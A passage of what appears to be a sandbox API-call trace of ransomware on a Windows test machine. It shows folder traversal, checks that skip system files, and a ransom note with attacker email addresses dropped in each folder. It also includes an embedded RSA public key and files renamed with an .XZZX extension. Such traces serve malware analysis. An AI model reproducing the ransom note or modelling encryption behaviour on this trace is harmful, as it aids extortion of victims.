lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0109.430] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x420 [0109.430] Sleep (dwMilliseconds=0x96) [0109.580] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.580] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0109.580] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0109.580] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0109.580] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0109.580] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0109.580] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0109.580] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0109.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0109.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0109.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0109.580] SetErrorMode (uMode=0x1) returned 0x1 [0109.580] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT") returned 80 [0109.580] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0109.581] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.581] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x424) returned 0x0 [0109.581] RegQueryValueExW (in: hKey=0x424, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb58b0, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3cb58b0*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0109.581] RegCloseKey (hKey=0x424) returned 0x0 [0109.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.581] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0109.582] CloseHandle (hObject=0x424) returned 1 [0109.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0109.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0109.583] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0109.583] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0109.583] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0109.583] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.583] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0109.583] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.583] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0109.583] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0109.583] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0109.583] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0109.583] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0109.583] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0109.583] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0109.584] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.584] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0109.584] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0109.584] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0109.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0109.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0109.584] SetErrorMode (uMode=0x1) returned 0x1 [0109.584] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0109.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0109.584] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0109.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0109.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.584] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.584] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0109.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0109.584] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0109.584] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0109.584] SetErrorMode (uMode=0x1) returned 0x1 [0109.584] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 71 [0109.585] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0109.585] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.585] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x428) returned 0x0 [0109.585] RegQueryValueExW (in: hKey=0x428, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5ae0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb5ae0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0109.585] RegCloseKey (hKey=0x428) returned 0x0 [0109.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.585] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0109.587] CloseHandle (hObject=0x428) returned 1 [0109.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0109.587] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0109.587] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.587] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0109.587] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0109.587] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0109.587] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0109.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0109.588] SetErrorMode (uMode=0x1) returned 0x1 [0109.588] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0109.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0109.588] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0109.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0109.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0109.589] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0109.589] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0109.590] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.590] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.590] lstrcmpW (lpString1="7BA753503E40D4C00F297B124258B908.XZZX", lpString2="..") returned 1 [0109.590] lstrcmpW (lpString1="7BA753503E40D4C00F297B124258B908.XZZX", lpString2=".") returned 1 [0109.590] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0109.590] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntldr") returned 0x0 [0109.590] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTLDR") returned 0x0 [0109.590] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0109.590] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0109.590] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0109.590] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0109.590] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 58 [0109.590] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0109.590] lstrcpyW (in: lpString1=0x17be7c, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0109.590] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0109.590] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0109.591] Sleep (dwMilliseconds=0x96) [0109.736] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.736] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0109.736] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0109.736] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0109.736] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0109.736] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0109.737] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0109.737] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0109.737] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0109.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0109.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0109.737] SetErrorMode (uMode=0x1) returned 0x1 [0109.737] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT") returned 75 [0109.737] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0109.737] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0109.737] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x430) returned 0x0 [0109.737] RegQueryValueExW (in: hKey=0x430, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb5d10, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cb5d10*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0109.738] RegCloseKey (hKey=0x430) returned 0x0 [0109.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0109.738] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0109.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0109.739] CloseHandle (hObject=0x430) returned 1 [0109.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0109.740] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0109.740] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0109.740] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0109.740] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0109.740] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0109.740] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.740] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0109.740] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0109.740] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0109.740] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0109.740] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0109.740] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0109.740] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0109.740] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0109.741] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0109.741] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0109.741] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0109.741] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0109.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0109.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0109.741] SetErrorMode (uMode=0x1) returned 0x1 [0109.741] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0109.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS 